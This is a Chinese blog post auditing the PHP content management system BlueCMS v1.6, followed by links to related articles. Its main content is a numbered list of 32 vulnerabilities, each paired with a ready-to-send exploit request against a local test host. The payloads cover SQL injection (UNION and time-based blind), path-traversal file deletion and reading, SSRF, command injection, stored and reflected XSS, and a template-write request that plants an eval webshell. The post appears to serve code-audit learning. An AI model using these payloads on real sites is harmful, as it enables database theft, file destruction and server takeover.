代码审计:Bluecms v1.6

已于 2024-07-26 21:56:28 修改
阅读量667 收藏 11
点赞数 13
文章标签: php 代码复审
于 2024-07-25 18:59:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GKD2019/article/details/140697485
版权

代码审计:Bluecms v1.6

漏洞列表如下(附Exp):
未完待续…

1、include/common.fun.php->getip()存在ip伪造漏洞
2、ad_js.php sql注入漏洞 Exp:view-source:http://127.0.0.3/bluecms/ad_js.php?ad_id=12%20+UNION%20+SELECT+1,2,3,4,5,6,database()
3、user.php 766行任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:face_pic3=2.php
4、user.php 955行任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=del_pic Post:id=2.php
5、user.php 476行任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=do_info_edit Post提交post_id=1&title=1&content=1&cat_id=1&area=1&useful_time=1&is_recommend1=1&top_type=1&is_head_line=1&link_man=1&link_phone=1&att1=1&att2=1&top_type1=1&is_head_line1=1&lit_pic=1.php
6、admin/article.php 132行存在后台sql注入漏洞 Exp:http://127.0.0.3/bluecms/admin/article.php?act=del&id=1 and if(length(select database())=7,1,sleep(10)) 时间盲注
7、admin/article.php 85行处存在任意文件删除漏洞 Exp:article.html
8、admin/attachment.php 78行存在后台sql注入漏洞 Exp:http://127.0.0.3/bluecms/admin/attachment.php?act=del&att_id=1 and if(length(select database())=7,1,sleep(10)) 时间盲注
9、admin/database.php 208行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/article.php?act=del&file_name=../1.php
10、admin/flash.php 47行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/flash.php?act=do_edit Post:image_id=1&image_path2=../1.php
11、admin/flash.php 47行处存在SSRF漏洞 Exp:http://127.0.0.3/bluecms/admin/flash.php?act=do_edit Post:image_id=1&image_path=http://网站 触发:点击flash链接(逻辑漏洞,strpos($_POST['image_path'], 'http://') != false,strpos返回的是位置,如果'http://'在首位,返回0.而0不等于false,从而绕过判断)
12、admin/link.php 50行处存在SSRF漏洞 Exp:http://127.0.0.3/bluecms/admin/link.php?act=do_edit Post:link_logo=http://网站 触发:点击网站上导航链接
13、admin/link.php 50行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/link.php?act=do_edit Post:link_logo2=../1.php
14、admin/info.php 281行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/info.php?act=do_edit Post:post_id=1&title=1&content=1&cat_id=1&area=1&useful_time=1&is_recommend1=1&top_type=1&is_head_line=1&link_man=1&link_phone=1&att1=1&att2=1&top_type1=1&is_head_line1=1&lit_pic=1.php
15、admin/info.php 526行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/info.php?act=del_pic Post:id=../1.php
16、admin/link.php 79行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/link.php?act=del&linkid=1 Post:link_logo=../1.php
17、admin/nav.php 63行存在后台sql注入漏洞 Exp:http://127.0.0.3/bluecms/admin/nav.php?act=edit&navid=1 union select 1,2,3,4,user(),6 limit 1,1
18、admin/tpl_manage.php 47行处存在任意文件写入漏洞,可写入webshell Exp:http://127.0.0.3/bluecms/admin/tpl_manage.php?act=do_edit Post:tpl_name=../../index.php&tpl_content=<?php eval($_POST[1]);?>
19、admin/tpl_manage.php 35行处存在任意文件读取漏洞 Exp:http://127.0.0.3/bluecms/admin/tpl_manage.php?act=edit&tpl_name=../../1.txt
20、include/filter.inc.php 11行处存在变量覆盖漏洞(影响user.php) Exp:http://127.0.0.3/bluecms/user.php?{变量名}={变量值}
21、uc_client/lib/uccode.class.php 38行处存在命令执行漏洞 Exp:$message = "[email=attacker@example.com]Hello; system('ls'); [/email]";
22、comment.php 113行处存在sql注入漏洞 Exp:http://127.0.0.3/bluecms/comment.php?act=send&id=1 Post:mood=1&comment=hhh&type=1   Client-Ip:1','1'),('','1','1','1','1',database(),'1','1
23、user.php 112行处存在任意文件读取漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=do_login Post:referer=&user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=1%40qq.com&safecode=s43f&from={base64(文件地址)}&act=do_login
24、user.php 206行处存在任意文件读取漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=do_reg Post:referer=&user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=1%40qq.com&safecode=s43f&from={base64(文件地址)}&act=do_reg
25、user.php 130行处存在反射型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=reg&from="/><script>alert(1);</script>"
26、user.php 58行处存在反射型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=login&from="/><script>alert(1);</script>"
27、user.php 772行存在储存型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=from=<script>alert(1);</script>&safecode=s43f&from=}&act=do_reg
28、user.php 134行存在储存型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=do_reg Post:user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=from=<script>alert(1);</script>&safecode=s43f&from=}&act=do_reg
29、guest_book.php 67行处存在sql注入漏洞 Exp:http://127.0.0.3/bluecms/comment.php?act=send Post:content=hhh   Client-Ip:1',user())#
30、guest_book.php 67行处存在储存型XSS漏洞 Exp:http://127.0.0.3/bluecms/comment.php?act=send Post:content=hhh   Client-Ip:1','<script>alert(1);</script>')#
31、admin/arc_cat.php 27行处存在储存型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=do_add Post:cat_name='<script>alert(1);</script>'&show_order=0&parent_id=1&title=1&keywords=1description=3
32、admin/arc_cat.php 53行处存在储存型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=edit Post:cat_name='<script>alert(1);</script>'&show_order=0&parent_id=1&title=1&keywords=1description=3
33、
GKDf1sh
关注
  • 13
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
适合初学者的代码审计——BlueCMS v1.6 sp1
weixin_50464560的博客
10-02 948
转载至https://www.anquanke.com/post/id/178545 robots   0x00 前言 大家好,我是聂风,在此,我做一个简单的代码审计的文章来方便同学们学习。BlueCMS v1.6 sp1一直以来就是PHP代码审计入门的最佳良品。这次我们就选择这一个案例进行学习。我先声明,我的代码审计方法是针对代码基础较为薄弱较薄弱的人群进行代码审计。   0x01 环境搭建 Phpstudy BlueCMS v1.6 sp1源码 代码审计工具(Seay源代码审计
BlueCms v1.6 本地文件包含漏洞代码审计
good good study
09-15 5271
目录 BlueCms POC构造 漏洞利用 BlueCms BlueCMS是一款专注于地方门户网站建设解决方案,基于PHP+MySQL的技术开发,全部源码开放。 复现版本为bluecmsv1.6版本,各位可自行下载。 POC构造 可以先用代码审计工具如Seay扫一波,或者直接观察代码。如下在user.php中,可以看到,如果act参数为pay值,这包含 'include/payment/'.$_POST['pay']."/index.php" 文件,其中pay参数没有过滤。按道理只要截断一下,
代码审计BlueCMSv1.6 sp1
weixin_50464560的博客
09-30 1613
这是一篇纪录关于BlueCMSv1.6 sp1两个SQL注入的审计过程,原文来自代码审计之SQL注入:BlueCMSv1.6 sp1 ,主要纪录一下个人在参考博文复现这两个漏洞经过。 href="https://www.ichunqiu.com/course/406" target="_blank">BlueCMS 1.6 SQL 注入漏洞 工具及环境 bluecms v2.1 sp1     链接:http://pan.baidu.com/s/1dFKLanR 密码
BlueCMS v1.6 代码审计之SQL注入
good good study
08-23 4652
目录 sql注入1 sql注入2 hackbar提交post数据 最近开始入坑代码审计,而最好的学习方式就是模仿,站在前人的肩膀上,能让我们更加快速的成长。 blueCMS是一款小众的CMS,网上也有人发布其相关漏洞。接下来对已公布的漏洞进行源码分析 环境准备 BlueCMS v1.6 phpstudy 2018 php5.5.35 phpstorm sql注入1 首先查看配置文件,发现网站有统一的过滤方法,在文件common.inc.php中,对$_post、$_get、$_co
Bluecms内容管理系统 v1.6sp1
03-19
(一)运行环境需求: 可用的httpd服务器(如Apache、Zeus、IIS等) ...MySQL4.1及以上 ...v1.6演示地址:http://www.bluecms.net/demo 官方网站:http://www.bluecms.net/ 官方论坛:htpp://www.bluecms.net/bbs
PHP地方门户系统-BlueCMS v1.6 sp1.rar
07-07
bluecms v1.6 升级到 bluecms v1.6 sp1版说明: 解决问题: 1.修正所有已知错误 2.前后台整合通用编辑器fckeditor,替换之前的editor 3.增加前台发布新闻过滤 4.增加禁止词语过滤 5.增加同一用户注册时间间隔...
bluecms_v1.6_sp1.zip
01-25
"bluecms_v1.6_sp1.zip" 是一个软件压缩包,主要包含了一个名为 "bluecms_v1.6_sp1" 的更新版本。这个版本可能是针对 "BlueCMS" 系统的一个更新,版本号为 1.6 Service Pack 1(SP1),通常SP代表着一个重要的补丁或...
bluecms源码 初级代码审计
07-31
【标题】:“BlueCMS源码 初级代码审计”指的是对BlueCMS 1.6版本的源代码进行安全审查和分析的过程,这是针对初学者的一个学习项目,旨在帮助他们了解和掌握代码审计的基础知识。 【描述】:“BlueCMS 1.6源码 ...
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 478
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 1018
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
基于PHP+MySQL组合开发的微信活动投票小程序源码系统 带完整的安装代码包以及搭建部署教程
codeji的博客
07-31 173
为了满足这一需求,我们推出了一款基于PHP+MySQL组合开发的微信活动投票小程序源码系统,旨在帮助用户快速搭建和管理投票活动。该系统采用了PHP作为后端开发语言,结合MySQL数据库进行数据存储和管理,确保了系统的稳定性和可扩展性。同时,通过优化数据库查询和索引设计,提高了数据处理的效率,确保了在大量用户同时参与投票时系统的稳定运行。同时,系统还支持多种交互方式,如分享、评论等,增强了用户的参与感和互动性。同时,管理员可以自定义投票选项、设定投票时间、限制投票次数等,确保活动的灵活性和公平性。
PHP一维数组怎么转关联数组
qq_32450471的博客
07-30 289
php是一门广泛应用于web开发的脚本语言。其强大的数组功能是其最重要的特征之一。在PHP中,数组是一个能够存储多个值的变量,并且这些值可以是任何类型的数据,比如整数、浮点数、字符串、布尔值、对象等等。此外,数组还可以分为索引数组和关联数组。本文主要介绍PHP中一维数组转关联数组的方法。
深入探索:使用PHP开发保利威Polyv云点播服务器API对接实践(一)(点播服务器 API、视频加密、跑马灯防录屏、自定义用户)
最新发布
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
08-01 297
屏幕录像是最难防范的一种视频盗版方式,保利威播放器提供的防录屏跑马灯功能,通过设定文字内容(一般是观众的身份ID信息)在视频上不规则滚动,以此来警示盗版者,达到视频版权保护的效果。另外在用户网站中,除了通过登录信息(cookies)验证观众是否有权限访问视频播放页面外,还可以通过保利威播放器验证观众是否有播放某一个视频的权限,从而实现对观众权限的双重验证。保利威接口请求方式,包含post和get两种方式,因此,需要做好两种请求方式的封装函数。
如何排查和解决PHP连接数据库MYSQL失败写锁的问题
qq_33665793的博客
07-30 931
并把此服务器加入到定期排查的服务器集合中,因此服务器当时是使用的分公司购买的,所以遗漏了。本文将介绍一些常见的排查步骤和解决方法,帮助开发者快速定位和解决PHP连接数据库失败的问题。首先,确保你的PHP代码中的数据库连接凭据(主机名、用户名、密码、数据库名)是正确的。- **Ping命令**:从Web服务器上执行ping命令,检查是否能够成功到达数据库服务器。- **数据库名错误**:确认连接时使用了正确的数据库名称。- **主机名错误**:确保使用正确的主机名或IP地址。
应急靶场(11):【玄机】日志分析-apache日志分析
OneMoreThink
07-30 424
题目提交当天访问次数最多的IP,即黑客IP黑客使用的浏览器指纹是什么,提交指纹的md5查看index.php页面被访问的次数,提交次数查看黑客IP访问了多少次,提交次数查看2023年8月03日8时这一个小时内有多少IP访问,提交次数靶场地址:https://xj.edisec.net/challenges/291、提交当天访问次数最多的IP,即黑客IP已知中间件是Linux上的Apache,常见日...
PHP表单必需字段
红客网络编程与渗透技术
07-28 376
PHP中处理表单时,确保必填字段被正确填写是非常重要的。这通常涉及到在客户端(使用HTML5)和服务器端(使用PHP)进行验证。以下是一个关于PHP表单必需字段的详细教程,包括如何在客户端和服务器端进行验证。
【WEB安全】 PHP基础文件知识完整教学中(超详细)
weixin_60838266的博客
07-29 565
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
easyadmin layui js监听返回结果,进行token验证防止连点
weixin_43652106的博客
07-29 256
easyadmin layui js监听返回结果,进行token验证防止连点
bluecms1.6源码
09-22
bluecms1.6源码是一个开源的内容管理系统的版本。这个版本具有强大的功能和灵活的扩展性。它适用于构建各种类型的网站,从个人博客到企业门户网站都可以使用。该源码提供了一个易于使用的后台管理系统,可以让网站管理员轻松地管理网站的内容和设置。 这个版本的bluecms还包含了一些常见的功能,如文档管理、用户管理、权限控制、评论管理等。它还提供了一个强大的模板系统,可以让用户根据自己的需求自定义网站的外观和布局。另外,该版本还支持多语言功能,可以根据用户的语言偏好自动切换网站的语言。 从技术角度来看,bluecms1.6源码采用了PHP语言开发,并使用MySQL数据库来存储数据。它使用了一些流行的开发框架和库,如CodeIgniter和jQuery,以提高开发效率和用户体验。 由于bluecms1.6是开源的,所以用户可以自由地修改和分发源码。这意味着用户可以根据自己的需要进行定制,并与其他人分享他们的改进。这也使得bluecms1.6成为了一个活跃的社区,用户可以在社区中交流经验和解决问题。 总结来说,bluecms1.6源码是一个功能强大、易于使用且高度可定制的内容管理系统。它适用于各种网站,并具有一个活跃的社区。无论您是个人用户还是企业用户,bluecms1.6都可以满足您的需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值